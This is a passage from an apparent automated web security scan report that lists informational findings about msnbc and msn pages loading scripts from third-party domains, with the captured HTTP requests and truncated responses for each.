Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA22
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 14366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
</div><script type="text/javascript" src="http://tk2.stj.s-msn.com/br/hp/11/en-us/js/404_1.js"></script>
...[SNIP]...

23.466. http://www.redacted/sck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/sck.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://col.stj.s-redacted/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js

Request

GET /sck.aspx HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:53:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA24
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...

23.467. http://www.redacted/worldwide.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/worldwide.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js

Request

GET /worldwide.aspx HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

23.468. http://www.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery.cycle/2.88/jquery.cycle.all.min.js
http://content.pulse360.com/91263EC8-A727-11DF-BD32-51423FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.469. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/24780215/ns/technology_and_science-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=d_technologygames&format=standard&numresults=5&linkcolor=339933&titlecolor=339933&fontsize=11&textcolor=666666
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/24780215/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.470. http://www.msnbc.redacted/id/26315908/vp=41321791& previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/26315908/vp=41321791&

Issue detail

The response dynamically includes the following script from another domain:

http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/26315908/vp=41321791& HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.471. http://www.msnbc.redacted/id/26613008/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/26613008/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/26613008/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.472. http://www.msnbc.redacted/id/27365695/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/27365695/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://edge.quantserve.com/quant.js

Request

GET /id/27365695/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634285663107700000"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 96597

<html xmlns:tvservices="http://www.msnbc.com"><head><title>Careers - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2556"></script>
...[SNIP]...
</script>

<script src="http://edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

23.473. http://www.msnbc.redacted/id/3032072/ns/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032072/ns/business

Issue detail

The response dynamically includes the following script from another domain:

http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032072/ns/business HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.474. http://www.msnbc.redacted/id/3032076/ns/health previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032076/ns/health

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/034CFD04-A960-11DF-9090-D37F3FF5047F
http://content.pulse360.com/27EE5888-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032076/ns/health HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.475. http://www.msnbc.redacted/id/3032118/ns/technology_and_science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032118/ns/technology_and_science

Issue detail

The response dynamically includes the following script from another domain:

http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.476. http://www.msnbc.redacted/id/3032507/ns/world_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032507/ns/world_news

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032507/ns/world_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.477. http://www.msnbc.redacted/id/3032525/ns/us_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032525/ns/us_news

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032525/ns/us_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.478. http://www.msnbc.redacted/id/3032553/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032553/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/0376BB26-A960-11DF-9090-D37F3FF5047F
http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032553/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.479. http://www.msnbc.redacted/id/3032619/ns/nightly_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032619/ns/nightly_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/node.pli?pub=starcomCustom
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032619/ns/nightly_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.480. http://www.msnbc.redacted/id/3032619/vp/41328231 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3032619/vp/41328231

Issue detail

The response dynamically includes the following scripts from other domains:

http://ar.voicefive.com/bmx3/node.pli?pub=starcomCustom
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3032619/vp/41328231 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.481. http://www.msnbc.redacted/id/3053415/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3053415/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery.cycle/2.88/jquery.cycle.all.min.js
http://content.pulse360.com/91263EC8-A727-11DF-BD32-51423FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/3053415/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.482. http://www.msnbc.redacted/id/3303511/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3303511/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/3303511/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.483. http://www.msnbc.redacted/id/3303540/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/3303540/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/3303540/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.484. http://www.msnbc.redacted/id/37643077 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/37643077

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/37643077 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.485. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41164445/ns/world_news-africa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41164445/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.486. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41253088/ns/technology_and_science-science

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542
http://service.collarity.com/cust/msnbc/ucs.js

Request

Response

23.487. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41311073/ns/business-consumer_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41311073/ns/business-consumer_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.488. http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41316837/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41316837/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.489. http://www.msnbc.redacted/id/41317259/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41317259/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41317259/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.490. http://www.msnbc.redacted/id/41317259/ns/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41317259/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41317259/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Pragma: no-cache
RTSS: 1
Expires: Sun, 30 Jan 2011 17:11:22 GMT
Date: Sun, 30 Jan 2011 17:11:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 89589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.491. http://www.msnbc.redacted/id/41317259/ns/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41317259/ns/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41317259/ns/politics/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.492. http://www.msnbc.redacted/id/41317259/ns/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41317259/ns/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41317259/ns/politics/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.493. http://www.msnbc.redacted/id/41320309/ns/technology_and_science-tech_and_gadgets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41320309/ns/technology_and_science-tech_and_gadgets

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41320309/ns/technology_and_science-tech_and_gadgets HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.494. http://www.msnbc.redacted/id/41321565/ns/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41321565/ns/business/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41321565/ns/business/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.495. http://www.msnbc.redacted/id/41322367/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41322367/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41322367/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.496. http://www.msnbc.redacted/id/41322659/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41322659/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41322659/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.497. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41323843/ns/world_news-mideastn_africa

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41323843/ns/world_news-mideastn_africa HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.498. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41323843/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41323843/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.499. http://www.msnbc.redacted/id/41324031 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324031

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324031 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.500. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324344/ns/world_news-south_and_central_asia

Issue detail

The response dynamically includes the following scripts from other domains:

